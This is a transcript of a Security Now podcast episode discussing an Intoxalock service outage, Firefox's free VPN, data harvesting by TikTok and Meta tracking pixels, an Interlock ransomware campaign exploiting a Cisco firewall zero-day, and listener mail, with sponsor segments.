Wow. The trouble that's now facing a gradually growing number of drivers who need to prove their sobriety to their cars is that the system's firmware has been designed to enforce a zero tolerance policy. In general, no recalibration when— if you don't get a recalibration when it's needed, you don't get to drive and you cannot now recalibrate. As a result, as the recalibration system outage stretches on day after day, an increasing number of drivers are unable to use their automobiles. In some cases, Intoxalock is apparently— and this is on a state-by-state basis— apparently able to offer a 10-day calibration extension, but that appears, as I said, to be limited by state. A posting on their service status page explains. It writes, effective immediately, service centers will be able to give your device a 10-day extension while our systems are being restored. Tennessee customers have a service date extension through Tuesday, March 24th.

Steve Gibson [01:01:24]:
That's today. At this time, this extension is not available in Michigan or Washington.

Mikah Sargent [01:01:32]:
Wow.

Steve Gibson [01:01:34]:
We're actively working toward a resolution and will notify you as soon as anything changes. So here we have an interesting case of people's physical lives being meaningfully impacted by a cyber event. Since the calibration and reporting system sounds like it's very data-based, based, I would not be surprised. Yeah, I would not be surprised to learn that Intoxalock, although this hasn't been publicly disclosed, had fallen victim to a generic ransomware attack which encrypted all of their systems. And in this case, consider the fact that the data that may also have been exfiltrated—

Mikah Sargent [01:02:26]:
yeah, a list of all the people. Oh my goodness.

Steve Gibson [01:02:31]:
Yes, all of the people. Extra personal, extra private, and extra sensitive. Yeah, you know, involving the identities and the habits, the drinking habits and the drinking and driving habits of U.S. drivers who have been under court-mandated driving restrictions. That's not the sort of data anyone would wish to have floating around the internet. I would argue, you know, it makes a Social Security number look tame by comparison.

Mikah Sargent [01:03:04]:
Yeah, this is a huge blackmail target. I, yeah, honestly, I was going to make some silly joke about, I wonder how many executives didn't get to work on time that day, and then you said what you said, and I thought, actually, it gave me goosebumps. This is horrible. This is awful. This is terrible.

Steve Gibson [01:03:23]:
Yeah, it's not, uh, not good. And they're— they apparently are the go-to company for, uh, for this service. I was looking to see, uh, where—

Mikah Sargent [01:03:35]:
what their status page says today because this was support It also made me wonder while you're looking for that, it also made me wonder if the calibration narrative is pushed by that company so that they can continue to make money even after those breathalyzers are installed. And of course that's just, you know, supposition, but it is a very interesting thing to be one of the main companies providing what ends up being sort of a government-mandated device, uh, needing to have these regular check-ins.

Steve Gibson [01:04:15]:
Yeah, and the good news is they have got their systems back up. Uh, at— I went to intoxalock.com/status and I'm getting a green bar, systems restored, services and installations resuming. So, um, and it's got lots of instructions for people who are inconvenienced and and, and there's a mobile app and, and so forth. So note, if you received a service date extension in Tennessee during the temporary pause, please return to the service center today on March 24th. Failure to do so may result in an extension or full restart of the interlock program, whatever that means. So anyway, uh, the good news is looks like they paid ransom or they restored from backups. We don't really know. But they are back up.

Steve Gibson [01:05:07]:
But if nothing else, this demonstrates that we are— we are— that our cyber world is increasingly interacting with the physical world and, you know, here, cause people a lot of inconvenience, especially when you've got all of your eggs in one basket. And as you said, very few, even with the system restored, if they did, if this was a cyber attack and they exfiltrated all their database data, as you said, now there's serious extortion opportunities for anybody important who, you know, cares about keeping their past problems with drinking and driving private.

Mikah Sargent [01:05:51]:
Yeah, that's mortifying.

Steve Gibson [01:05:55]:
Okay, so exactly one week ago On last Tuesday the 17th, Mozilla posted some welcome news under their heading, More Reasons to Love Firefox. I don't need any more reasons. I love Firefox, but okay. Uh, they wrote what's new now and what's coming soon. They, uh, they, they start their post off rather generically by writing Firefox is for people who make their own choices online. Apparently they're saying, you know, Chrome people are sheep. I don't know. From, from, from what stays private, they wrote, to the tools that help get things done.

Steve Gibson [01:06:33]:
That commitment to choice shows up throughout the Firefox experience. The AI controls is just the latest example, meaning you can turn them off, making it possible to turn generative AI features off, on, or customize them feature by feature. Over the coming weeks, we'll be rolling out a series of updates that build on that. Expect more control where it matters, better protections in the background, and a few new tools that make everyday browsing better. You may even spot a fresh face of Firefox along the way. Okay, then they, you know, they talk about the ability to turn off any generative AI, a new feature coming in the next Firefox 149. Which will allow side-by-side page display and the ability to write and attach notes to tabs. Um, okay, uh, about— okay, um, yeah, I'm not sure about the whole AI thing.

Steve Gibson [01:07:31]:
The side-by-side web page thing sounds as though it might come in handy for me for podcast production since I'm often flipping back and forth between Google Docs where I author the page and the source information. So that would be cool. But the forthcoming new feature that caught my eye, and which I felt sure would interest our listeners, was Firefox 149, which drops today on March 24th, its new free built-in VPN. They wrote, a free built-in VPN is coming to Firefox. Free VPNs can sometimes mean sketchy arrangements that end up compromising your privacy. And I've often said, you know, don't trust a free VPN from some sketchy provider. Certainly Mozilla is not that. They said, but ours is built, is built from our data principles and commitment to be the world's most trusted browser.

Steve Gibson [01:08:39]:
It routes your browser traffic through a proxy to hide your IP address and location while you browse, giving you stronger protection and protection online with no extra downloads. Users will have 50 gigabytes of data monthly in the US, France, Germany, and UK to start. Available in Firefox 149 starting March 24th. In other words, as I said, today. Now, we know that there's been something of a gold rush to VPN services driven by the increasing use of IP-based geolocation to limit underage access to age-restricted internet content and services. Since Firefox's desktop Unfortunately, its desktop presence continues to slip in terms of market share. It's down from 6.3% last year, down now just down to 4.2% desktop share this year. So Mozilla may be hoping that the presence of a built-in free VPN service will help.

Steve Gibson [01:09:54]:
It is worth noting also that it has not escaped, unfortunately, the, uh, the awareness of legislators that people are rushing to use VPNs in order to get around a state-based, uh, location age restriction. And there actually has been some conversation about legislation to prohibit VPN use. Which, you know, good luck with that. I mean, it's like, hey, you know, those TCP connections, they're pesky. I think we better outlaw TCP.

Mikah Sargent [01:10:33]:
Oh, Lord, could you imagine?

Steve Gibson [01:10:35]:
Oh, come on, guys. Where does it stop? One place I know it doesn't stop is with our advertisers. And like a beautiful— a great place for us to take a break for a sponsor.

Mikah Sargent [01:10:52]:
I love that. What a great segue. Leo, take it away.

Leo Laporte [01:10:56]:
Hey guys, this episode of Security Now brought to you by OutSystems, the number one AI development platform. OutSystems helps businesses bridge the enterprise gap to their agentic future, where the constraints of the past give way to unlimited capacity and scale OutSystems enables businesses of all sizes to build agents that actually do work. Things like take actions, make decisions, and integrate with data more than just answering questions. OutSystems provides the only AI development platform that's unified, agile, and enterprise-proven. Let me explain. Unified because you build, run, and govern apps and agents all in one platform, OutSystems. Agile because you now can innovate at the speed of AI and importantly, without compromising quality or control. It's enterprise proven because it's trusted by enterprises for some of the most important mission-critical AI applications and durable innovation.

Leo Laporte [01:11:58]:
OutSystems, it's the secret weapon behind the world's most successful companies. And this isn't just for small apps. These are for massive, in many cases, massive complex systems that are running banks, insurance companies, government services. OutSystems even helps companies with aging IT environments bridge the gap to the AI future without a rip-and-replace nightmare. It almost feels like you could do anything. OutSystems provides the safest and fastest way for an enterprise to go from, we need an AI strategy, to, yeah, we have a functioning AI application. Stop wondering how AI will change your business and start building the agents that will lead it. Visit OutSystems.com/TWIT to see how the world's most innovative enterprises use OutSystems to build, deploy, and manage AI apps and agents quickly and cost-effectively without compromising reliability and security.

Leo Laporte [01:12:53]:
That's OutSystems.com/TWIT to book a demo. OutSystems.com/TWIT. /twit. We thank them so much for supporting the good work Steve does here at Security Now. Now back to the show.

Mikah Sargent [01:13:10]:
Indeed, we are back to the show. Take it away, Steve.

Steve Gibson [01:13:14]:
Okay, so, uh, I just learned how far tracking pixels— and we now need to put that in air quotes because they are so much more, uh They're easy to miss because, much like cookies, the code which their presence on any web page allows to run is completely hidden from us. I mean, it's not that you can't get it, but it's not easy to see. Last Wednesday the 18th, the security researchers at JScrambler shared what they had recently learned about what TikTok and Meta are both now doing. Their headline was Beyond Analytics: The Silent Collection of Commercial Intelligence by TikTok and Meta Ad Pixels. Okay, and as we're going to see, uh, this writing, uh, Jay Scrambler's writing, is targeted at web merchants who are voluntarily putting these insidious tracking pixels onto their sites. Because, you know, this is not something that, that happens without the site provider's knowledge. This is something that they, you know, said, oh yeah, you know, we're— we, we want the analytics, or we want the whatever we're getting in return. So every page that we serve will have a reference to some JavaScript back at Meta or at TikTok or wherever, basically causing the user's web browser to, to, to pull in that resource, uh, and invoke whatever the script is.

Steve Gibson [01:15:04]:
So, um, here's what they explain. They wrote, TikTok and Meta's tracking pixels are are quietly harvesting personal data, granular checkout interactions, and detailed commerce intelligence from the users of the websites that implement them. The collection is going far beyond what ad attribution requires, creating serious privacy compliance risks and competitive disadvantages for the businesses involved. JScrambler conducted a runtime analysis of the ad pixels used by TikTok and Meta on actual websites, revealing that their default behavior requires immediate attention from every organization that employs them. The analysis focused on large companies in the retail, hospitality, and healthcare sectors However, it's worth noting that most businesses with an online presence use these tracking pixels on their websites as well. Okay, now I'm, I'm sure I don't need to tell our listeners that this is not something I, you know, with GRC would ever consider doing. I'm, I'm annoyed that I've given Google any presence at all, but that little search box, you know, that little search box is that, that's a pro visitor feature. Other than that, you know, GRC may be ancient appearing, but it's also completely devoid of all modern web analytics because I just, I would rather protect my users' privacy.

Steve Gibson [01:16:49]:
That what's so insidious about this is that when a company says, okay, yes, we'll, we'll make a query to your ad server to pull in your ad pixel, they have no control over what it does once it gets there. That's the key point. The— it's very much like software that goes out and downloads some other software, uh, to enhance itself. That if that— if the behavior of that augmented software changes than the overall product changes after the fact. Yeah. Anyway, Jay Scrambler continues writing, tracking pixels were once just a small snippet of code on a web page to confirm an ad impression or log a visit. Almost all websites use them to track user behavior, measure ad performance, and optimize marketing efforts. These pixels let businesses see which ads drive traffic, conversations, or sales, and provide data to retarget users who showed interest but might not have completed a purchase.

Steve Gibson [01:18:09]:
What many website owners likely don't realize is that TikTok and Meta's pixels now go far beyond those traditional tracking tags. They collect user emails, phone numbers, and addresses, turning seemingly anonymous browsing data into persistent identifiable, identifiable user profiles. TikTok's Pixel, they write, creates 3 different data records for each user interaction: a primary event record of what the user did, such as viewing a product or adding to a cart, a metadata record, and a performance record, all connected using the same session ID. When personal information like an email or phone number appears on a page, TikTok's identity module processes it, normalizes it and converts it into an SHA-256 style hashed identifier before sending it out. Meta takes a similar approach, hashing a wide range of fields including first and last names, locations, and external identifiers. The hashes are deterministic, meaning they produce the same output for the same input each time. And because the hash is built from predictable data like emails and phone numbers, it's easy to re-identify them by matching those hashes against existing hash data. Meaning that if metadata— I mean, if Meta has your email address and hashes it, they get the same hash.

Steve Gibson [01:20:01]:
If they get— if they have your phone number and hash it, they get the same hash. So when those hashes later pop up out on the web, they know it's you. There's no mystery there. It's not— you are not anonymized. And they write, it effectively eliminates anonymization, allowing platforms to recover original user data and build long-term behavioral profiles without the user's knowledge. In practice, This is like a candidate input matching process where emails or phone numbers are compiled or generated, hashed, and then compared against the target hashes to find matches. Identity resolution is only part of the problem. JScrambler's research, they wrote, found that TikTok and Meta's ad pixels methodically harvest detailed product-level intelligence and entire customer journeys from merchant websites.

Steve Gibson [01:21:05]:
Meta and TikTok's requests routinely include product names, unit prices, quantities, currency, and total cart values. They also logged specific checkout actions such as add to cart, or add payment info. In other words, stuff that is none of their business. Meta's telemetry even records the structure of checkout forms and buttons, providing insight into how a merchant's site is built. Wow.

Mikah Sargent [01:21:43]:
Are they making this data available to the people whose sites they're on?

Steve Gibson [01:21:49]:
That's wild.

Mikah Sargent [01:21:50]:
This is not a trade.

Steve Gibson [01:21:52]:
It's total intrusive for Meta's benefit, and maybe they're selling it. Yeah, I mean, it's data that they are aggregating. So I'll just interrupt to note that, you know, you might be thinking, uh, if you might be thinking that none of this is any of Meta's effing business, I would agree with you wholeheartedly. It is so wrong and intrusive. They do it simply because they can. They can because it's hidden, because web browsers will run by default any JavaScript they're given, and because there's no one looking, there's no one to stop them. J Scrambler continues, well, and I'll note also, Meta can say, oh, but we hash the data. We anonymize it.

Steve Gibson [01:22:44]:
No, you don't. You're not throwing in a random token with the hash, because if you did, it wouldn't be useful to you. It would then be purely random noise. So they said merchants are unlikely to be aware of the extent to which their websites share data with these tracking pixels. While they might know that pixels collect basic conversion information, much of the detailed product-level checkout stage and structural form data is automatically captured or passed through integrations like Shopify with little visibility. While businesses might think they're enabling only standard tracking, in reality they are feeding third-party platforms with a deep, continuous view of their product catalog, pricing, and customer behavior that could potentially benefit larger rivals. The implications from a privacy compliance and sensitive data exposure standpoint should be very concerning from any or for any organization using these pixels. JScrambler found TikTok pixels capturing sensitive data even before a user had the opportunity to make a consent choice.

Steve Gibson [01:24:12]:
And in some cases, even after a user had clicked reject all, we observed TikTok capturing physical addresses entered into store locator fields at major French and German retailers and transmitting the data back to their servers. Meta's Pixel includes a feature called automatic, automatic events, which is enabled by default. The feature automatically scans page elements and captures information such as checkout interactions and visible payment card details, including the last digits expiration date, and cardholder name.

Mikah Sargent [01:25:00]:
Why? I mean, I know why, but I just—

Steve Gibson [01:25:04]:
you should— full spying.

Mikah Sargent [01:25:07]:
Yeah, it's absolutely full spying. And to do it without any regard of just like— they're not even having to explain themselves because, as you've pointed out, no one's paying attention to this.

Steve Gibson [01:25:18]:
Yep. Since this— they write, since this is the default behavior and not opt in, merchants may not be aware that the pixel is collecting this information. The pixel. I love calling it. It's like calling it a pixel makes it seem, oh, look, it's a little, it's just a tiny little thing.

Mikah Sargent [01:25:35]:
Exactly.

Steve Gibson [01:25:38]:
On separate sites, Meta captured recipients' full names and delivery addresses when users selected address options during checkout. TikTok's pixel was observed exhibiting similar behavior, harvesting sensitive user data during the checkout process. This included partial payment card details and other personal data provided by the customer. Both TikTok and Meta's pixel code can load and begin transmitting data. Hear it again. Again, both TikTok and Meta's pixel code can begin— I'm sorry, can load and begin transmitting data before the website's consent management system has time to block it, meaning information can leave the browser before the user's choice is applied. Even more, that's right, right? We asked the user, they said no, but oops, it was too late. Yeah, even more concerning is that data may be transmitted in clear text occasionally within the request URL itself, exposing sensitive information to browser histories, server logs, intermediaries, and debugging tools.

Steve Gibson [01:27:03]:
This vulnerability— so it wasn't even well done with like a privacy-first approach. They said this vulnerability stems not only from the Pixel's data collection methods but also from misconfigurations during its implementation or from issues with the website's underlying architecture. Consequently, the attack surface is significantly broader than a surface-level analysis would suggest. The behaviors JS scrambler documented put websites in direct conflict with GDPR, CCPA, and other major bri— privacy regulations. The potential violation triggers include consent failures, inadvertent personal data transmission, and financial or address data exposed in logs that outlast the original request. In addition, the exposure of partial cardholder data and address information increases the risk for identity theft and secondary data breaches. From a competitive standpoint, merchants need to understand that the pixels they implement— pixels, I mean, calling it a pixel is so wrong.

Mikah Sargent [01:28:18]:
Yep, I agree.

Steve Gibson [01:28:19]:
The pixels they implement are not passive measurement tools. They are instead active data collection systems that feed proprietary commercial intelligence —such as pricing, product mix, conversions, and customer behavior—directly into the same global advertising platforms that every other merchant on those platforms, including rivals, relies on. Larger rivals with bigger ad budgets could benefit, because the more data the platform collects from all merchants, the better its targeting becomes. Often better targeting favors those with the most budget to spend on ads because there's more ads available for, for, uh, choosing. To manage these risks, they write, organizations need to do considerably more than just review a pixel's documentation. This involves auditing actual pixel configurations meaning work, and implement— implementing continuous monitoring to catch scope creep, meaning the pixel used to be a cute little thing that only targeted ads, but that was 10 years ago. Now you're downloading a whole suite of spying intelligenceware, uh, in that cute little pixel's JavaScript. They finish where A third-party script begins collecting more data than originally intended.

Steve Gibson [01:29:59]:
Exactly so. Wow. Geez Louise. That's, yeah, so that's again frustrating. It's, it's, it's commerce, you know, getting away with everything it can. And of course, why wouldn't they? You know, we're talking Meta. They're an aggressive commercial organization and they've, you know, convinced the whole world to put their cute little tracking pixels everywhere. Yikes.

Steve Gibson [01:30:26]:
Okay, uh, as we know, no one is an island. Uh, unfortunately, that's a problem if you don't get any messages. I suppose we should not be surprised that Russia's increasingly stringent and pervasive internet stranglehold is choking their own local companies. Russia's private sector is desperately asking their government to lift the recently imposed total bans on Telegram, WhatsApp, and other foreign messaging platforms. Uh, it seems that not everything needed to conduct business in Russia can be found within Mother Russia and that Russian entities need to conduct and work with foreign partners. And unfortunately, Russia is saying, no, we don't want you to be using, you know, they've got their own. I can't remember now what it's called. They did a native Russian messaging app, which of course no one wants to use.

Steve Gibson [01:31:42]:
Because we know that Russia is spying on it. So nobody outside Russia wants to have anything to do with some Russian spyware. Who knows what it does once it gets into their machines? Uh, another bit of news. I saw this blurb in a security news summary and I thought, okay, well, uh, that's interesting. Let me share it first, then I'll tell everyone what I thought. The security news blurb was titled OpenClaw phishing campaign. And it just said threat actors are spamming GitHub issues and tagging other developers with fake promises of OpenClaw tokens. The plan is to lure the devs to phishing sites where they're asked to connect their crypto wallets but are getting their accounts emptied.

Steve Gibson [01:32:41]:
Okay, so that's all we know. I don't ever want to see anyone hurt, of course. Really, I don't ever. But anyone who would naively connect their crypto wallet containing any amount of crypto which they're not entirely prepared to be separated from in the next moment, especially if they consider themselves to be savvy enough to be a developer, uh, they would have a difficult time extracting much sympathy from me, even though I would never want them to be hurt.

Mikah Sargent [01:33:22]:
I mean, really, you know, you sometimes need an object lesson, and someone who's making those mistakes needs perhaps an object lesson.

Steve Gibson [01:33:29]:
And I just hope it's not too expensive. A lesson. I would certainly be sorry that if anyone were scammed, but I would not be very surprised. So our takeaway here is please, please always be careful, you know, especially anytime you're connecting any wallet to any sort of automated system which you cannot be 100% certain of, you know, really, like, set up a secondary wallet, transfer a little bit of working money there, and then, you know, use that if you must connect it to something, but, you know, not your wallet where you actually store any useful amount of money. Since we previously touched upon Cisco's very bad 10.0 CVE-2026-20127, which was that widely exploited authentication zero-day discovered while being exploited in Cisco's Catalyst SD-WAN enterprise product line. Really, anyone could be forgiven for confusing that one with Cisco's CVE-2026-20131. So not 27, no, 31, which is another— wait for it— CVSS 10.0 critical vulnerability in Cisco's systems. As I said at the top of the show, what would the Security Now podcast be without a brand new shiny Cisco CVSS critical 10.0.

Steve Gibson [01:35:22]:
The NIST NVD, the National Vulnerability Database, says of the new one, 31, they write, a vulnerability in the web-based management interface, who would have guessed, of Cisco Secure Firewall Management Center. Apparently not that secure software, could allow an unauthenticated remote attacker to execute arbitrary Java code as root on an affected device. In other words, there you go, Cisco 10.0. They wrote, this vulnerability is due to insecure deserialization of a user-supplied Java byte stream. An attacker could exploit this vulnerability by sending a crafted serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. That's right. Unfortunately, most of the world that's not listening to this podcast has not caught up to the many continuing demonstrations that authentication does not work.

Steve Gibson [01:36:51]:
If authentication did work, then unauthenticated hackers and attackers would not and could not be continuously breaking into supposedly protected systems in ways that bypass their authentication controls, right? I mean, 1 plus 1 equals 2. Not to mention, oh, I don't know, allowing them to execute their arbitrary Java code as root on breached devices. And so what happens to enterprises who solely rely upon Cisco's broken authentication promises to protect their perimeters? Last Wednesday the 18th, Amazon Threat Intelligence posted their observation under the headline Amazon Threat Intelligence Teams Identify Interlock Ransomware Campaign Targeting Enterprise Firewalls. Gee, which enterprise firewall? Do you think that could be? Amazon's threat hunters wrote, quote, Amazon Threat Intelligence has identified an active Interlock ransomware campaign exploiting CVE-2026-20131, a critical vulnerability in Cisco Secure Firewall Management Center software that could allow an unauthenticated remote attacker to execute arbitrary Java code as root on an affected device, which was disclosed by Cisco on March 4th, 2026. Now, that's an important date. March 4th, 2026. Disclosure means patch available on March 4th, 2026. They wrote, they, Amazon.

Steve Gibson [01:38:48]:
After Cisco's disclosure, Amazon Threat Intelligence began research into this vulnerability using Amazon's Madpots global sensor network, a system of honeypot servers that attract and monitor criminal cyber activity. While looking for any current or past exploits of this vulnerability, Our research found that Interlock was exploiting this vulnerability 36 days before its public disclosure, beginning January 26, 2026. This wasn't, they write, this wasn't just another vulnerability exploit. Interlock had a zero-day. In their hands, giving them a 5-week head start to compromise organizations before defenders even knew to look. Upon making this discovery, we shared our findings with Cisco to help support their investigation and protect customers. Okay, so just so that everyone is clear about the timing of this again, Amazon discovered exploitation of this zero-day dating back as far as January 26th, and Cisco's announcement and patch wasn't made available until March 4th. So for at least 36 days, or a little more than 5 weeks, only the bad guys knew of this, and even fully patched and up-to-date Cisco Secure firewalls and the enterprises behind them were being compromised and falling victim to this interlocked ransomware and campaign through no fault of theirs.

Steve Gibson [01:40:46]:
Those— they were fully patched and updated. Amazon explained what they found, writing, a misconfigured infrastructure server, essentially a poorly secured staging area used by the attackers They actually found an in— a misconfigured infrastructure server of the attackers exposed, they wrote, Interlock's complete operational toolkit. This rare mistake provided Amazon's security teams with visibility into the ransomware group's multi-staged attack chain. Custom remote access Trojans, backdoor programs that give attackers control of compromised systems, reconnaissance scripts, meaning automated tools for mapping victim networks, and evasion techniques. In other words, Amazon has honeypots. The bad guys infected a honeypot. Amazon was able to use the infection to track backwards up into the attacker's infrastructure which they found improperly set up, so they were able to get in. Now, hold on.

Steve Gibson [01:41:59]:
What if—

Mikah Sargent [01:42:01]:
maybe I'm writing a movie now, but what if that was just a reverse honeypot and it points Amazon down the wrong route when they found all this data?

Steve Gibson [01:42:11]:
That could be possible, although what they worked from was Cisco's fresh disclosure. So So they had evidence that that system was attacking their honeypot back as many as 36 days earlier using information that was not public. So nobody knew how it could be used to get into their customers' machines. We're at an hour and a half in. Let's take a break and then I'm going to finish up. With what Amazon tells us about this interesting and unfortunately all too common Cisco vulnerability.

Mikah Sargent [01:42:56]:
I will say the magic words to summon Leo Laporte. Bippity boppity Laporte.

Leo Laporte [01:43:04]:
This episode of Security Now brought to you by Zscaler, the world's largest cloud security platform. You know, we talk about this all the time. The potential rewards of AI are far too great for any company to ignore, but So are the risks, right? Loss of sensitive data, attacks against enterprise-managed AI. Generative AI increases opportunities for threat actors, helping them to rapidly create phishing lures, write malicious code, and automate data extraction. Did you know there were 1.3 million instances of Social Security numbers leaked to AI applications last year? ChatGPT and Microsoft Copilot saw nearly 3.2 million data violations. Yikes. It's time to rethink your organization's safe use of public and private AI. And if, if you want to know more, just check out what Siva, the Director of Security and Infrastructure at Zuora, says about using Zscaler to prevent AI attacks.

Leo Laporte [01:44:03]:
Watch.

Mikah Sargent [01:44:04]:
With Zscaler being in line in a security protection strategy, it helps us monitor all the traffic.

Steve Gibson [01:44:10]:
So even if a bad actor were to to use AI because we have tight security framework around our endpoint helps us proactively prevent that activity from happening.

Mikah Sargent [01:44:20]:
AI is tremendous in terms of its opportunities, but it also brings in challenges.

Steve Gibson [01:44:24]:
We're confident that Zscaler is gonna help us ensure that we're not slowed down by security challenges, but continue to take advantage of all the advancements.

Leo Laporte [01:44:34]:
Thank you, Siva. With Zscaler Zero Trust plus AI, you can safely adopt generative AI and private AI to boost productivity across the business. Their zero-trust architecture plus AI helps you reduce the risks of AI-related data loss and protects against AI attacks to guarantee greater productivity and compliance. Learn more at zscaler.com/security. That's zscaler.com/security. We thank him so much for supporting Security Now. Now I see Steve's all caffeinated, so let's get back to the show.

Mikah Sargent [01:45:09]:
Let's do it.

Steve Gibson [01:45:10]:
How did he know? That's a big cup. Okay, so, uh, just to finish on Amazon's threat intelligence, they wrote AWS infrastructure and customer workloads on AWS were not observed to be involved in this campaign. Meaning Cisco customers, not Amazon customers. They said this advisory shares comprehensive technical analysis and indicators of compromise to help organizations identify potential compromise and defend against Interlox operations, right? I mean, this was going on for 36 days. Anybody who the bad guys could find who had this firewall may well have been compromised. So this, you know, a true problem. They said Amazon Threat Intelligence identified threat activity potentially related to this CVE-20131 beginning January 26th. Observed activity involved HTTP requests to a specific path in the affected software.

Steve Gibson [01:46:17]:
Request bodies contained Java code execution attempts and two embedded URLs, one used to deliver configuration data supporting the exploit and another designed to confirm successful exploitation by causing a vulnerable target to perform an HTTP PUT request and upload a generated file. So that was the, the compromised system sending stuff back up to the bad guy's infrastructure. They said multiple variations of these URLs were observed during across different exploit attempts. To advance the investigation and obtain additional threat intelligence, we performed the expected— so they were pretending to be infected— we performed, we Amazon, the expected HTTP PUT request with the anticipated file content. Essentially, we pretended to be a successfully compromised system. This successfully prompted Interlock to proceed to the next stage, issuing commands to fetch and execute a malicious ELF binary, a Linux executable file, from a remote server. So that suggests that the Cisco firewall is Linux-based, and so this was downloading Linux malware into and to be run by the Cisco firewall. They said when analysts retrieved the binary, They discovered the same host, that is, the hacker-controlled server, is used for distributing Interlock's entire operational toolkit.

Steve Gibson [01:47:55]:
The exposed infrastructure organized artifacts into separate paths corresponding to individual targets, with the same paths used for both downloading tools to compromise hosts and uploading operational artifacts back to the staging server. And if they were able to look around in there, they may have seen all the uploads from all the infected systems. No one's talking about how many systems were infected, but my guess is Amazon knows and Cisco probably knows and hopefully is not happy about it. They said the ELF binary and associated artifacts are attributable to the Interlock ransomware family based on convergent technical and operational indicators. The embedded ransom note The ransom note and the Tor negotiation portal are consistent with Interlock's established branding and infrastructure. The ransom note's invocation of multiple data protection regulations— oh, you gotta love that. You are in— you— we just attacked you and infected you, and now we've exfiltrated your data, which puts you in violation of various data protection regulations. Congratulations.

Steve Gibson [01:49:08]:
Oh, by the way, yes, congratulations. So they said the ransom note's invocation of multiple data protection regulations reflects Interlock's documented practice of citing regulatory exposure to pressure victims, essentially threatening organizations not just with data encryption and exfiltration, but with regulatory fines and compliance violations. Wow. It's clever. It's clever. They're bold. The campaign-specific organization identifier embedded in the note aligns with Interlock's per-victim tracking model. Interlock has historically targeted specific sectors where operational disruption creates maximum pressure for payment.

Steve Gibson [01:50:00]:
Education represents the largest share of their activity, followed by engineering, architecture, and construction firms, manufacturing and industrial organizations, healthcare providers, and government and public sector entities. Amazon's posting then goes into very interesting and rich detail It's certainly relevant to anyone who may have fallen victim to this or anyone who might worry that they may have. But what matters most is the way Amazon's threat intelligence group concludes. They write, the real story here isn't just about one vulnerability or one ransomware group. It's about the fundamental challenge zero-day exploits pose to every security model. When attackers exploit vulnerabilities before patches exist, even the most diligent patching programs cannot protect you during that critical window. This is precisely why defense in depth is essential. Layered security controls provide protection when any single control fails or hasn't yet been deployed.

Steve Gibson [01:51:21]:
Rapid patching remains foundational in vulnerability management, but defense in depth requires organizations— I'm sorry, helps organizations not to be defenseless during the window between exploit and patch. Right? So there you have it. The point Amazon is making is that if there is no defense in depth, if everything relies upon that single point, which could fail, and we see keeps failing, an organization's security perimeter could be breached even if they did absolutely nothing wrong. During that at least 5-week interval, any fully patched and fully up-to-date Cisco firewall could have been successfully breached through no fault of their IT managing staff. Unfortunately, this is not what we normally see. We are usually— we're usually noting that lax and lazy and inattentive IT was at fault, at least at fault, for not keeping their equipment up to date, right? Like if patch was available months ago and they still hadn't got around to updating. But not so this time. As Amazon reminds us, defense in depth is needed because it's never safe to depend entirely upon any single security control.

Steve Gibson [01:53:03]:
Anytime any management portal is exposed to the entire global internet where access is controlled by some form of authentication, the security of the entire organization now rests upon that single point, which could fail. And that state of affairs would be acceptable if nothing more could be done, right? If there was, if you did like If we've done everything and there's— we still have a single point of failure, if nothing more could be done, then okay, I guess that's the best we can do. But it is almost always the case that additional parallel protections could be erected so that, for example, almost, almost no one is even able to see that possibly vulnerable Authentication interface. No one in China, no one in North Korea, no one in Iran, no one in Russia can even get to because there's port filtering that blocks their access to that authentication interface. Unless you really need everybody in the world to be able to guess your password, don't give them the opportunity.

Mikah Sargent [01:54:23]:
So then arguably It— you said, um, in this case the IT did everything right, but it seems like you are also arguing that they didn't, because doing everything right would also mean that you have security in depth, right?

Steve Gibson [01:54:38]:
I— yeah, so that's a very good point. What I meant was IT was key, at least keeping everything patched. But this demonstrates that even keeping everything patched is really no longer enough. You, you need other layers. And if somebody had other layers, although you wouldn't want to be lax on patching, at least being lax on patching, like being a few weeks or months late, well, you wouldn't get infected because bad guys couldn't even attempt to infect your system. So really The jargon that I've been using most recently, that I used at Zero Trust World and before, was really bringing stronger meaning to least privilege. You want least privilege to apply. It is a privilege if someone in China has the opportunity to guess your password.

Steve Gibson [01:55:45]:
Why? Why have you given Chinese attackers the privilege of doing that? They shouldn't even be able to see that you have a management interface. You know, they should be blocked by simple IP-based filtering, and it's so easy to do. But everyone says, oh, look, Cisco, you know, they have a, you know, we, oh, we got security. No, you need— your security needs security.

Mikah Sargent [01:56:13]:
I like that. That's a shirt for security now. Your security needs security.

Steve Gibson [01:56:17]:
Your security needs security. Okay, so finally, before we talk about listener feedback, I just did want to mention that Cisco's not alone. Last Wednesday, and then updated on Saturday, Ubiquiti released a security update to patch a critical, also One of the rare— I, you know, it used to be that CVSS 10.0 were rare, right? Nobody had them. But like, the worst you would see was a 9.8, and we would joke about, oh, you got to try real hard to get up to a 10.0. Well, unfortunately, Cisco has put the lie to that because they're getting them all the time now. Uh, in this case, so did Ubiquiti. A CVSS 10.0 was discovered in its UniFi internet gateway and Wi-Fi management application. The flaw enabled a path traversal exploit that could allow threat actors to access the device's configuration files.

Steve Gibson [01:57:15]:
That's never good. And take over UniFi gateways that way. So Ubiquiti UniFi users are advised to update. I know we've got a bunch of Ubiquiti users and UniFi users. Leo is a big proponent. So everybody should update. Um, okay, some listener feedback. Vern Mastil, he said, uh, his email had the subject Clocks, Cursive, and Coding with AI.

Steve Gibson [01:57:47]:
And he wrote, Steve, we already have many children who cannot tell time on an analog clock. Many school systems began phasing out cursive writing a decade or more ago. In another generation, the ability to read and write cursive will fall into the category of arcane skills understood and practiced by only grizzled old professors in dusty, cluttered offices. He said, for decades we've been teaching students how to code. With advances in AI, it seems clear that this too will cease. Why bother when you can have an AI bang out apps in minutes? It seems likely that in the near future, old-school style programming will also become an arcane skill known and understood by only a few. I have to agree. I think we're very clearly seeing that actually writing code will change into managing its authorship by, uh, you know, AI devices.

Steve Gibson [01:58:58]:
That clearly seems to be where we're headed. And I remind everyone, what we have today is not what we're going to have tomorrow. It's going to be getting way, way better. Jeffrey Ko wrote, hey Steve, since it's getting close to tax time, I thought you might enjoy seeing the IRS version of the click fix exploit. And he said, I blurred out the script. He said, I'm a longtime listener, every episode, Spinrite owner, regards, Jeffrey D. Coe. So, and he attached in his email a picture of an Internal Revenue Service Department of the Treasury sent from Austin, Texas with their zip code It's letter number 1058, and it says, final notice, notice of intent to levy, and notice of your right to a hearing.

Steve Gibson [01:59:54]:
